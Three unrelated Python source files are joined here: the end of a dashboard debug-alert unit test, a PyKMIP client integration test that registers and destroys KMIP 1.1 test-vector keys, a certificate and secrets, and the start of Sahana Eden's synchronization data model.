self.assertNotIn('LOOKUP', response.body)
def testGet_WithStoredAnomalies_ShowsStoredAnomalies(self):
test_key = self._AddSampleData()
anomaly.Anomaly(
test=test_key, start_revision=309, end_revision=310,
median_before_anomaly=60, median_after_anomaly=70,
bug_id=12345).put()
response = self.testapp.get(
'/debug_alert?test_path=%s' % utils.TestPath(test_key))
# Information about the stored anomaly should be somewhere on the page.
self.assertIn('12345', response.body)
def testFetchLatestRows(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchLatestRows(test_key, 4)
revisions = [r.revision for r in rows]
self.assertEqual([316, 317, 318, 319], revisions)
def testFetchAroundRev(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key, 310, 5, 8)
revisions = [r.revision for r in rows]
self.assertEqual(
[305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317],
revisions)
def testFetchRowsAroundRev_NotAllRowsAvailable(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key, 310, 100, 100)
# There are only 20 rows in the sample data, so only 20 can be fetched.
self.assertEqual(20, len(rows))
def testChartSeries(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key, 310, 5, 5)
# The indexes used in the chart series should match those in the lookup.
self.assertEqual(
[(0, 60.65), (1, 55.61), (2, 61.88), (3, 61.51), (4, 59.58),
(5, 71.79), (6, 71.97), (7, 71.63), (8, 67.16), (9, 70.91)],
debug_alert._ChartSeries(rows))
def testRevisionList(self):
test_key = self._AddSampleData()
rows = debug_alert._FetchRowsAroundRev(test_key, 310, 5, 5)
# The lookup dict maps indexes to x-values in the input series.
self.assertEqual(
[305, 306, 307, 308, 309, 310, 311, 312, 313, 314],
debug_alert._RevisionList(rows))
def testCsvUrl_RowsGiven_AllParamsSpecified(self):
self._AddSampleData()
rows = graph_data.Row.query().fetch(limit=20)
self.assertEqual(
'/graph_csv?test_path=M%2Fb%2Fsuite%2Ffoo&num_points=20&rev=319',
debug_alert._CsvUrl('M/b/suite/foo', rows))
def testCsvUrl_NoRows_OnlyTestPathSpecified(self):
# If there are no rows available for some reason, a CSV download
# URL can still be constructed, but without specific revisions.
self.assertEqual(
'/graph_csv?test_path=M%2Fb%2Fsuite%2Ffoo',
debug_alert._CsvUrl('M/b/suite/foo', []))
def testGraphUrl_RevisionGiven_RevisionParamInUrl(self):
test_key = self._AddSampleData()
# Both string and int can be accepted for revision.
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo&rev=310',
debug_alert._GraphUrl(test_key.get(), 310))
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo&rev=310',
debug_alert._GraphUrl(test_key.get(), '310'))
def testGraphUrl_NoRevisionGiven_NoRevisionParamInUrl(self):
test_key = self._AddSampleData()
# Both None and empty string mean "no revision".
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo',
debug_alert._GraphUrl(test_key.get(), ''))
self.assertEqual(
'/report?masters=M&bots=b&tests=suite%2Ffoo',
debug_alert._GraphUrl(test_key.get(), None))
if __name__ == '__main__':
unittest.main()
| |
# Copyright (c) 2015 The Johns Hopkins University/Applied Physics Laboratory
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import six
import testtools
import pytest
from kmip.core import enums
from kmip.pie import exceptions
from kmip.pie import factory
from kmip.pie import objects
@pytest.mark.usefixtures("simple")
class TestProxyKmipClientIntegration(testtools.TestCase):
def setUp(self):
super(TestProxyKmipClientIntegration, self).setUp()
self.object_factory = factory.ObjectFactory()
def tearDown(self):
super(TestProxyKmipClientIntegration, self).tearDown()
def test_symmetric_key_create_get_destroy(self):
"""
Test that the ProxyKmipClient can create, retrieve, and destroy a
symmetric key.
"""
uid = self.client.create(enums.CryptographicAlgorithm.AES, 256)
self.assertIsInstance(uid, six.string_types)
try:
key = self.client.get(uid)
self.assertIsInstance(key, objects.SymmetricKey)
self.assertEqual(
key.cryptographic_algorithm,
enums.CryptographicAlgorithm.AES)
self.assertEqual(key.cryptographic_length, 256)
finally:
self.client.destroy(uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.get, uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.destroy, uid)
def test_symmetric_key_register_get_destroy(self):
"""
Test that the ProxyKmipClient can register, retrieve, and destroy a
symmetric key.
"""
# Key encoding obtained from Section 14.2 of the KMIP 1.1 test
# documentation.
key = objects.SymmetricKey(
enums.CryptographicAlgorithm.AES,
128,
(b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E'
b'\x0F'))
uid = self.client.register(key)
self.assertIsInstance(uid, six.string_types)
try:
result = self.client.get(uid)
self.assertIsInstance(result, objects.SymmetricKey)
self.assertEqual(
result, key, "expected {0}\nobserved {1}".format(result, key))
finally:
self.client.destroy(uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.get, uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.destroy, uid)
def test_asymmetric_key_pair_create_get_destroy(self):
"""
Test that the ProxyKmipClient can create, retrieve, and destroy an
asymmetric key pair.
"""
public_uid, private_uid = self.client.create_key_pair(
enums.CryptographicAlgorithm.RSA, 2048)
self.assertIsInstance(public_uid, six.string_types)
self.assertIsInstance(private_uid, six.string_types)
try:
public_key = self.client.get(public_uid)
self.assertIsInstance(public_key, objects.PublicKey)
self.assertEqual(
public_key.cryptographic_algorithm,
enums.CryptographicAlgorithm.RSA)
self.assertEqual(public_key.cryptographic_length, 2048)
private_key = self.client.get(private_uid)
self.assertIsInstance(private_key, objects.PrivateKey)
self.assertEqual(
private_key.cryptographic_algorithm,
enums.CryptographicAlgorithm.RSA)
self.assertEqual(private_key.cryptographic_length, 2048)
finally:
self.client.destroy(public_uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.get, public_uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.destroy,
public_uid)
self.client.destroy(private_uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.get, private_uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.destroy,
private_uid)
def test_public_key_register_get_destroy(self):
"""
Test that the ProxyKmipClient can register, retrieve, and destroy a
public key.
"""
# Key encoding obtained from Section 13.4 of the KMIP 1.1 test
# documentation.
key = objects.PublicKey(
enums.CryptographicAlgorithm.RSA,
2048,
(b'\x30\x82\x01\x0A\x02\x82\x01\x01\x00\xAB\x7F\x16\x1C\x00\x42'
b'\x49\x6C\xCD\x6C\x6D\x4D\xAD\xB9\x19\x97\x34\x35\x35\x77\x76'
b'\x00\x3A\xCF\x54\xB7\xAF\x1E\x44\x0A\xFB\x80\xB6\x4A\x87\x55'
b'\xF8\x00\x2C\xFE\xBA\x6B\x18\x45\x40\xA2\xD6\x60\x86\xD7\x46'
b'\x48\x34\x6D\x75\xB8\xD7\x18\x12\xB2\x05\x38\x7C\x0F\x65\x83'
b'\xBC\x4D\x7D\xC7\xEC\x11\x4F\x3B\x17\x6B\x79\x57\xC4\x22\xE7'
b'\xD0\x3F\xC6\x26\x7F\xA2\xA6\xF8\x9B\x9B\xEE\x9E\x60\xA1\xD7'
b'\xC2\xD8\x33\xE5\xA5\xF4\xBB\x0B\x14\x34\xF4\xE7\x95\xA4\x11'
b'\x00\xF8\xAA\x21\x49\x00\xDF\x8B\x65\x08\x9F\x98\x13\x5B\x1C'
b'\x67\xB7\x01\x67\x5A\xBD\xBC\x7D\x57\x21\xAA\xC9\xD1\x4A\x7F'
b'\x08\x1F\xCE\xC8\x0B\x64\xE8\xA0\xEC\xC8\x29\x53\x53\xC7\x95'
b'\x32\x8A\xBF\x70\xE1\xB4\x2E\x7B\xB8\xB7\xF4\xE8\xAC\x8C\x81'
b'\x0C\xDB\x66\xE3\xD2\x11\x26\xEB\xA8\xDA\x7D\x0C\xA3\x41\x42'
b'\xCB\x76\xF9\x1F\x01\x3D\xA8\x09\xE9\xC1\xB7\xAE\x64\xC5\x41'
b'\x30\xFB\xC2\x1D\x80\xE9\xC2\xCB\x06\xC5\xC8\xD7\xCC\xE8\x94'
b'\x6A\x9A\xC9\x9B\x1C\x28\x15\xC3\x61\x2A\x29\xA8\x2D\x73\xA1'
b'\xF9\x93\x74\xFE\x30\xE5\x49\x51\x66\x2A\x6E\xDA\x29\xC6\xFC'
b'\x41\x13\x35\xD5\xDC\x74\x26\xB0\xF6\x05\x02\x03\x01\x00\x01'),
enums.KeyFormatType.PKCS_1)
uid = self.client.register(key)
self.assertIsInstance(uid, six.string_types)
try:
result = self.client.get(uid)
self.assertIsInstance(result, objects.PublicKey)
self.assertEqual(
result, key, "expected {0}\nobserved {1}".format(result, key))
finally:
self.client.destroy(uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.get, uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.destroy, uid)
def test_private_key_register_get_destroy(self):
"""
Test that the ProxyKmipClient can register, retrieve, and destroy a
private key.
"""
# Key encoding obtained from Section 13.4 of the KMIP 1.1 test
# documentation.
key = objects.PrivateKey(
enums.CryptographicAlgorithm.RSA,
2048,
(b'\x30\x82\x04\xA5\x02\x01\x00\x02\x82\x01\x01\x00\xAB\x7F\x16'
b'\x1C\x00\x42\x49\x6C\xCD\x6C\x6D\x4D\xAD\xB9\x19\x97\x34\x35'
b'\x35\x77\x76\x00\x3A\xCF\x54\xB7\xAF\x1E\x44\x0A\xFB\x80\xB6'
b'\x4A\x87\x55\xF8\x00\x2C\xFE\xBA\x6B\x18\x45\x40\xA2\xD6\x60'
b'\x86\xD7\x46\x48\x34\x6D\x75\xB8\xD7\x18\x12\xB2\x05\x38\x7C'
b'\x0F\x65\x83\xBC\x4D\x7D\xC7\xEC\x11\x4F\x3B\x17\x6B\x79\x57'
b'\xC4\x22\xE7\xD0\x3F\xC6\x26\x7F\xA2\xA6\xF8\x9B\x9B\xEE\x9E'
b'\x60\xA1\xD7\xC2\xD8\x33\xE5\xA5\xF4\xBB\x0B\x14\x34\xF4\xE7'
b'\x95\xA4\x11\x00\xF8\xAA\x21\x49\x00\xDF\x8B\x65\x08\x9F\x98'
b'\x13\x5B\x1C\x67\xB7\x01\x67\x5A\xBD\xBC\x7D\x57\x21\xAA\xC9'
b'\xD1\x4A\x7F\x08\x1F\xCE\xC8\x0B\x64\xE8\xA0\xEC\xC8\x29\x53'
b'\x53\xC7\x95\x32\x8A\xBF\x70\xE1\xB4\x2E\x7B\xB8\xB7\xF4\xE8'
b'\xAC\x8C\x81\x0C\xDB\x66\xE3\xD2\x11\x26\xEB\xA8\xDA\x7D\x0C'
b'\xA3\x41\x42\xCB\x76\xF9\x1F\x01\x3D\xA8\x09\xE9\xC1\xB7\xAE'
b'\x64\xC5\x41\x30\xFB\xC2\x1D\x80\xE9\xC2\xCB\x06\xC5\xC8\xD7'
b'\xCC\xE8\x94\x6A\x9A\xC9\x9B\x1C\x28\x15\xC3\x61\x2A\x29\xA8'
b'\x2D\x73\xA1\xF9\x93\x74\xFE\x30\xE5\x49\x51\x66\x2A\x6E\xDA'
b'\x29\xC6\xFC\x41\x13\x35\xD5\xDC\x74\x26\xB0\xF6\x05\x02\x03'
b'\x01\x00\x01\x02\x82\x01\x00\x3B\x12\x45\x5D\x53\xC1\x81\x65'
b'\x16\xC5\x18\x49\x3F\x63\x98\xAA\xFA\x72\xB1\x7D\xFA\x89\x4D'
b'\xB8\x88\xA7\xD4\x8C\x0A\x47\xF6\x25\x79\xA4\xE6\x44\xF8\x6D'
b'\xA7\x11\xFE\xC8\x50\xCD\xD9\xDB\xBD\x17\xF6\x9A\x44\x3D\x2E'
b'\xC1\xDD\x60\xD3\xC6\x18\xFA\x74\xCD\xE5\xFD\xAF\xAB\xD6\xBA'
b'\xA2\x6E\xB0\xA3\xAD\xB4\xDE\xF6\x48\x0F\xB1\x21\x8C\xD3\xB0'
b'\x83\xE2\x52\xE8\x85\xB6\xF0\x72\x9F\x98\xB2\x14\x4D\x2B\x72'
b'\x29\x3E\x1B\x11\xD7\x33\x93\xBC\x41\xF7\x5B\x15\xEE\x3D\x75'
b'\x69\xB4\x99\x5E\xD1\xA1\x44\x25\xDA\x43\x19\xB7\xB2\x6B\x0E'
b'\x8F\xEF\x17\xC3\x75\x42\xAE\x5C\x6D\x58\x49\xF8\x72\x09\x56'
b'\x7F\x39\x25\xA4\x7B\x01\x6D\x56\x48\x59\x71\x7B\xC5\x7F\xCB'
b'\x45\x22\xD0\xAA\x49\xCE\x81\x6E\x5B\xE7\xB3\x08\x81\x93\x23'
b'\x6E\xC9\xEF\xFF\x14\x08\x58\x04\x5B\x73\xC5\xD7\x9B\xAF\x38'
b'\xF7\xC6\x7F\x04\xC5\xDC\xF0\xE3\x80\x6A\xD9\x82\xD1\x25\x90'
b'\x58\xC3\x47\x3E\x84\x71\x79\xA8\x78\xF2\xC6\xB3\xBD\x96\x8F'
b'\xB9\x9E\xA4\x6E\x91\x85\x89\x2F\x36\x76\xE7\x89\x65\xC2\xAE'
b'\xD4\x87\x7B\xA3\x91\x7D\xF0\x7C\x5E\x92\x74\x74\xF1\x9E\x76'
b'\x4B\xA6\x1D\xC3\x8D\x63\xBF\x29\x02\x81\x81\x00\xD5\xC6\x9C'
b'\x8C\x3C\xDC\x24\x64\x74\x4A\x79\x37\x13\xDA\xFB\x9F\x1D\xBC'
b'\x79\x9F\xF9\x64\x23\xFE\xCD\x3C\xBA\x79\x42\x86\xBC\xE9\x20'
b'\xF4\xB5\xC1\x83\xF9\x9E\xE9\x02\x8D\xB6\x21\x2C\x62\x77\xC4'
b'\xC8\x29\x7F\xCF\xBC\xE7\xF7\xC2\x4C\xA4\xC5\x1F\xC7\x18\x2F'
b'\xB8\xF4\x01\x9F\xB1\xD5\x65\x96\x74\xC5\xCB\xE6\xD5\xFA\x99'
b'\x20\x51\x34\x17\x60\xCD\x00\x73\x57\x29\xA0\x70\xA9\xE5\x4D'
b'\x34\x2B\xEB\xA8\xEF\x47\xEE\x82\xD3\xA0\x1B\x04\xCE\xC4\xA0'
b'\x0D\x4D\xDB\x41\xE3\x51\x16\xFC\x22\x1E\x85\x4B\x43\xA6\x96'
b'\xC0\xE6\x41\x9B\x1B\x02\x81\x81\x00\xCD\x5E\xA7\x70\x27\x89'
b'\x06\x4B\x67\x35\x40\xCB\xFF\x09\x35\x6A\xD8\x0B\xC3\xD5\x92'
b'\x81\x2E\xBA\x47\x61\x0B\x9F\xAC\x6A\xEC\xEF\xE2\x2A\xCA\xE4'
b'\x38\x45\x9C\xDA\x74\xE5\x96\x53\xD8\x8C\x04\x18\x9D\x34\x39'
b'\x9B\xF5\xB1\x4B\x92\x0E\x34\xEF\x38\xA7\xD0\x9F\xE6\x95\x93'
b'\x39\x6E\x8F\xE7\x35\xE6\xF0\xA6\xAE\x49\x90\x40\x10\x41\xD8'
b'\xA4\x06\xB6\xFD\x86\xA1\x16\x1E\x45\xF9\x5A\x3E\xAA\x5C\x10'
b'\x12\xE6\x66\x2E\x44\xF1\x5F\x33\x5A\xC9\x71\xE1\x76\x6B\x2B'
b'\xB9\xC9\x85\x10\x99\x74\x14\x1B\x44\xD3\x7E\x1E\x31\x98\x20'
b'\xA5\x5F\x02\x81\x81\x00\xB2\x87\x12\x37\xBF\x9F\xAD\x38\xC3'
b'\x31\x6A\xB7\x87\x7A\x6A\x86\x80\x63\xE5\x42\xA7\x18\x6D\x43'
b'\x1E\x8D\x27\xC1\x9A\xC0\x41\x45\x84\x03\x39\x42\xE9\xFF\x6E'
b'\x29\x73\xBB\x7B\x2D\x8B\x0E\x94\xAD\x1E\xE8\x21\x58\x10\x8F'
b'\xBC\x86\x64\x51\x7A\x5A\x46\x7F\xB9\x63\x01\x4B\xD5\xDC\xC2'
b'\xB4\xFB\x08\x7C\x23\x03\x9D\x11\x92\x0D\xBE\x22\xFD\x9F\x16'
b'\xB4\xD8\x9E\x23\x22\x5C\xD4\x55\xAD\xBA\xF3\x2E\xF4\x3F\x18'
b'\x58\x64\xA3\x6D\x63\x03\x09\xD6\x85\x3F\x77\x14\xB3\x9A\xAE'
b'\x1E\xBE\xE3\x93\x8F\x87\xC2\x70\x7E\x17\x8C\x73\x9F\x9F\x02'
b'\x81\x81\x00\x96\x90\xBE\xD1\x4B\x2A\xFA\xA2\x6D\x98\x6D\x59'
b'\x22\x31\xEE\x27\xD7\x1D\x49\x06\x5B\xD2\xBA\x1F\x78\x15\x7E'
b'\x20\x22\x98\x81\xFD\x9D\x23\x22\x7D\x0F\x84\x79\xEA\xEF\xA9'
b'\x22\xFD\x75\xD5\xB1\x6B\x1A\x56\x1F\xA6\x68\x0B\x04\x0C\xA0'
b'\xBD\xCE\x65\x0B\x23\xB9\x17\xA4\xB1\xBB\x79\x83\xA7\x4F\xAD'
b'\x70\xE1\xC3\x05\xCB\xEC\x2B\xFF\x1A\x85\xA7\x26\xA1\xD9\x02'
b'\x60\xE4\xF1\x08\x4F\x51\x82\x34\xDC\xD3\xFE\x77\x0B\x95\x20'
b'\x21\x5B\xD5\x43\xBB\x6A\x41\x17\x71\x87\x54\x67\x6A\x34\x17'
b'\x16\x66\xA7\x9F\x26\xE7\x9C\x14\x9C\x5A\xA1\x02\x81\x81\x00'
b'\xA0\xC9\x85\xA0\xA0\xA7\x91\xA6\x59\xF9\x97\x31\x13\x4C\x44'
b'\xF3\x7B\x2E\x52\x0A\x2C\xEA\x35\x80\x0A\xD2\x72\x41\xED\x36'
b'\x0D\xFD\xE6\xE8\xCA\x61\x4F\x12\x04\x7F\xD0\x8B\x76\xAC\x4D'
b'\x13\xC0\x56\xA0\x69\x9E\x2F\x98\xA1\xCA\xC9\x10\x11\x29\x4D'
b'\x71\x20\x8F\x4A\xBA\xB3\x3B\xA8\x7A\xA0\x51\x7F\x41\x5B\xAC'
b'\xA8\x8D\x6B\xAC\x00\x60\x88\xFA\x60\x1D\x34\x94\x17\xE1\xF0'
b'\xC9\xB2\x3A\xFF\xA4\xD4\x96\x61\x8D\xBC\x02\x49\x86\xED\x69'
b'\x0B\xBB\x7B\x02\x57\x68\xFF\x9D\xF8\xAC\x15\x41\x6F\x48\x9F'
b'\x81\x29\xC3\x23\x41\xA8\xB4\x4F'),
enums.KeyFormatType.PKCS_8)
uid = self.client.register(key)
self.assertIsInstance(uid, six.string_types)
try:
result = self.client.get(uid)
self.assertIsInstance(result, objects.PrivateKey)
self.assertEqual(
result, key, "expected {0}\nobserved {1}".format(result, key))
finally:
self.client.destroy(uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.get, uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.destroy, uid)
def test_x509_certificate_register_get_destroy(self):
"""
Test that the ProxyKmipClient can register, retrieve, and destroy an
X.509 certificate.
"""
# Certificate encoding obtained from Section 13.2 of the KMIP 1.1 test
# documentation.
cert = objects.X509Certificate(
(b'\x30\x82\x03\x12\x30\x82\x01\xFA\xA0\x03\x02\x01\x02\x02\x01'
b'\x01\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01\x01\x05\x05'
b'\x00\x30\x3B\x31\x0B\x30\x09\x06\x03\x55\x04\x06\x13\x02\x55'
b'\x53\x31\x0D\x30\x0B\x06\x03\x55\x04\x0A\x13\x04\x54\x45\x53'
b'\x54\x31\x0E\x30\x0C\x06\x03\x55\x04\x0B\x13\x05\x4F\x41\x53'
b'\x49\x53\x31\x0D\x30\x0B\x06\x03\x55\x04\x03\x13\x04\x4B\x4D'
b'\x49\x50\x30\x1E\x17\x0D\x31\x30\x31\x31\x30\x31\x32\x33\x35'
b'\x39\x35\x39\x5A\x17\x0D\x32\x30\x31\x31\x30\x31\x32\x33\x35'
b'\x39\x35\x39\x5A\x30\x3B\x31\x0B\x30\x09\x06\x03\x55\x04\x06'
b'\x13\x02\x55\x53\x31\x0D\x30\x0B\x06\x03\x55\x04\x0A\x13\x04'
b'\x54\x45\x53\x54\x31\x0E\x30\x0C\x06\x03\x55\x04\x0B\x13\x05'
b'\x4F\x41\x53\x49\x53\x31\x0D\x30\x0B\x06\x03\x55\x04\x03\x13'
b'\x04\x4B\x4D\x49\x50\x30\x82\x01\x22\x30\x0D\x06\x09\x2A\x86'
b'\x48\x86\xF7\x0D\x01\x01\x01\x05\x00\x03\x82\x01\x0F\x00\x30'
b'\x82\x01\x0A\x02\x82\x01\x01\x00\xAB\x7F\x16\x1C\x00\x42\x49'
b'\x6C\xCD\x6C\x6D\x4D\xAD\xB9\x19\x97\x34\x35\x35\x77\x76\x00'
b'\x3A\xCF\x54\xB7\xAF\x1E\x44\x0A\xFB\x80\xB6\x4A\x87\x55\xF8'
b'\x00\x2C\xFE\xBA\x6B\x18\x45\x40\xA2\xD6\x60\x86\xD7\x46\x48'
b'\x34\x6D\x75\xB8\xD7\x18\x12\xB2\x05\x38\x7C\x0F\x65\x83\xBC'
b'\x4D\x7D\xC7\xEC\x11\x4F\x3B\x17\x6B\x79\x57\xC4\x22\xE7\xD0'
b'\x3F\xC6\x26\x7F\xA2\xA6\xF8\x9B\x9B\xEE\x9E\x60\xA1\xD7\xC2'
b'\xD8\x33\xE5\xA5\xF4\xBB\x0B\x14\x34\xF4\xE7\x95\xA4\x11\x00'
b'\xF8\xAA\x21\x49\x00\xDF\x8B\x65\x08\x9F\x98\x13\x5B\x1C\x67'
b'\xB7\x01\x67\x5A\xBD\xBC\x7D\x57\x21\xAA\xC9\xD1\x4A\x7F\x08'
b'\x1F\xCE\xC8\x0B\x64\xE8\xA0\xEC\xC8\x29\x53\x53\xC7\x95\x32'
b'\x8A\xBF\x70\xE1\xB4\x2E\x7B\xB8\xB7\xF4\xE8\xAC\x8C\x81\x0C'
b'\xDB\x66\xE3\xD2\x11\x26\xEB\xA8\xDA\x7D\x0C\xA3\x41\x42\xCB'
b'\x76\xF9\x1F\x01\x3D\xA8\x09\xE9\xC1\xB7\xAE\x64\xC5\x41\x30'
b'\xFB\xC2\x1D\x80\xE9\xC2\xCB\x06\xC5\xC8\xD7\xCC\xE8\x94\x6A'
b'\x9A\xC9\x9B\x1C\x28\x15\xC3\x61\x2A\x29\xA8\x2D\x73\xA1\xF9'
b'\x93\x74\xFE\x30\xE5\x49\x51\x66\x2A\x6E\xDA\x29\xC6\xFC\x41'
b'\x13\x35\xD5\xDC\x74\x26\xB0\xF6\x05\x02\x03\x01\x00\x01\xA3'
b'\x21\x30\x1F\x30\x1D\x06\x03\x55\x1D\x0E\x04\x16\x04\x14\x04'
b'\xE5\x7B\xD2\xC4\x31\xB2\xE8\x16\xE1\x80\xA1\x98\x23\xFA\xC8'
b'\x58\x27\x3F\x6B\x30\x0D\x06\x09\x2A\x86\x48\x86\xF7\x0D\x01'
b'\x01\x05\x05\x00\x03\x82\x01\x01\x00\xA8\x76\xAD\xBC\x6C\x8E'
b'\x0F\xF0\x17\x21\x6E\x19\x5F\xEA\x76\xBF\xF6\x1A\x56\x7C\x9A'
b'\x13\xDC\x50\xD1\x3F\xEC\x12\xA4\x27\x3C\x44\x15\x47\xCF\xAB'
b'\xCB\x5D\x61\xD9\x91\xE9\x66\x31\x9D\xF7\x2C\x0D\x41\xBA\x82'
b'\x6A\x45\x11\x2F\xF2\x60\x89\xA2\x34\x4F\x4D\x71\xCF\x7C\x92'
b'\x1B\x4B\xDF\xAE\xF1\x60\x0D\x1B\xAA\xA1\x53\x36\x05\x7E\x01'
b'\x4B\x8B\x49\x6D\x4F\xAE\x9E\x8A\x6C\x1D\xA9\xAE\xB6\xCB\xC9'
b'\x60\xCB\xF2\xFA\xE7\x7F\x58\x7E\xC4\xBB\x28\x20\x45\x33\x88'
b'\x45\xB8\x8D\xD9\xAE\xEA\x53\xE4\x82\xA3\x6E\x73\x4E\x4F\x5F'
b'\x03\xB9\xD0\xDF\xC4\xCA\xFC\x6B\xB3\x4E\xA9\x05\x3E\x52\xBD'
b'\x60\x9E\xE0\x1E\x86\xD9\xB0\x9F\xB5\x11\x20\xC1\x98\x34\xA9'
b'\x97\xB0\x9C\xE0\x8D\x79\xE8\x13\x11\x76\x2F\x97\x4B\xB1\xC8'
b'\xC0\x91\x86\xC4\xD7\x89\x33\xE0\xDB\x38\xE9\x05\x08\x48\x77'
b'\xE1\x47\xC7\x8A\xF5\x2F\xAE\x07\x19\x2F\xF1\x66\xD1\x9F\xA9'
b'\x4A\x11\xCC\x11\xB2\x7E\xD0\x50\xF7\xA2\x7F\xAE\x13\xB2\x05'
b'\xA5\x74\xC4\xEE\x00\xAA\x8B\xD6\x5D\x0D\x70\x57\xC9\x85\xC8'
b'\x39\xEF\x33\x6A\x44\x1E\xD5\x3A\x53\xC6\xB6\xB6\x96\xF1\xBD'
b'\xEB\x5F\x7E\xA8\x11\xEB\xB2\x5A\x7F\x86'))
uid = self.client.register(cert)
self.assertIsInstance(uid, six.string_types)
try:
result = self.client.get(uid)
self.assertIsInstance(result, objects.X509Certificate)
self.assertEqual(
result, cert, "expected {0}\nobserved {1}".format(
result, cert))
finally:
self.client.destroy(uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.get, uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.destroy, uid)
def test_secret_data_register_get_destroy(self):
"""
Test that the ProxyKmipClient can register, retrieve, and destroy a
secret.
"""
# Secret encoding obtained from Section 3.1.5 of the KMIP 1.1 test
# documentation.
secret = objects.SecretData(
(b'\x53\x65\x63\x72\x65\x74\x50\x61\x73\x73\x77\x6F\x72\x64'),
enums.SecretDataType.PASSWORD)
uid = self.client.register(secret)
self.assertIsInstance(uid, six.string_types)
try:
result = self.client.get(uid)
self.assertIsInstance(result, objects.SecretData)
self.assertEqual(
result, secret, "expected {0}\nobserved {1}".format(
result, secret))
finally:
self.client.destroy(uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.get, uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.destroy, uid)
def test_opaque_object_register_get_destroy(self):
"""
Test that the ProxyKmipClient can register, retrieve, and destroy an
opaque object.
"""
# Object encoding obtained from Section 3.1.5 of the KMIP 1.1 test
# documentation.
obj = objects.OpaqueObject(
b'\x53\x65\x63\x72\x65\x74\x50\x61\x73\x73\x77\x6F\x72\x64',
enums.OpaqueDataType.NONE)
uid = self.client.register(obj)
self.assertIsInstance(uid, six.string_types)
try:
result = self.client.get(uid)
self.assertIsInstance(result, objects.OpaqueObject)
self.assertEqual(
result, obj, "expected {0}\nobserved {1}".format(result, obj))
finally:
self.client.destroy(uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.get, uid)
self.assertRaises(
exceptions.KmipOperationFailure, self.client.destroy, uid)
| |
# -*- coding: utf-8 -*-
""" Sahana Eden Synchronization
@copyright: 2009-2013 (c) Sahana Software Foundation
@license: MIT
Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, including without limitation the rights to use,
copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following
conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
__all__ = ["SyncDataModel",
"sync_rheader",
"sync_now",
"sync_job_reset"
]
from gluon import *
from gluon.dal import Row
from gluon.storage import Storage
from ..s3 import *
# =============================================================================
class SyncDataModel(S3Model):
names = ["sync_config",
"sync_status",
"sync_repository",
"sync_task",
"sync_resource_filter",
"sync_job",
"sync_log"
]
def model(self):
T = current.T
db = current.db
request = current.request
s3 = current.response.s3
messages = current.messages
UNKNOWN_OPT = messages.UNKNOWN_OPT
NONE = messages["NONE"]
crud_strings = s3.crud_strings
define_table = self.define_table
add_components = self.add_components
configure = self.configure
set_method = self.set_method
s3_datetime_represent = lambda dt: \
S3DateTime.datetime_represent(dt, utc=True)
# -------------------------------------------------------------------------
# Configuration
# -------------------------------------------------------------------------
tablename = "sync_config"
define_table(tablename,
Field("proxy",
label=T("Proxy Server URL"),
requires=IS_EMPTY_OR(IS_URL(mode="generic"))),
*s3_meta_fields())
# Field configuration
# @todo: make in-line
table = db[tablename]
table.uuid.readable = True
table.uuid.label = "UUID"
table.uuid.comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("UUID"),
T("Unique identifier which THIS repository identifies itself with when sending synchronization requests.")))
table.proxy.comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Proxy Server URL"),
T("URL of the default proxy server to connect to remote repositories (if required). If only some of the repositories require the use of a proxy server, you can configure this in the respective repository configurations.")))
# CRUD Strings
crud_strings[tablename] = Storage(
title_display = T("Synchronization Settings"),
title_update = T("Edit Synchronization Settings"),
msg_record_modified = T("Synchronization settings updated"))
# Resource Configuration
configure(tablename,
insertable=False,
deletable=False,
update_next=URL(c="sync", f="config", args=["1", "update"]))
# -------------------------------------------------------------------------
# Status
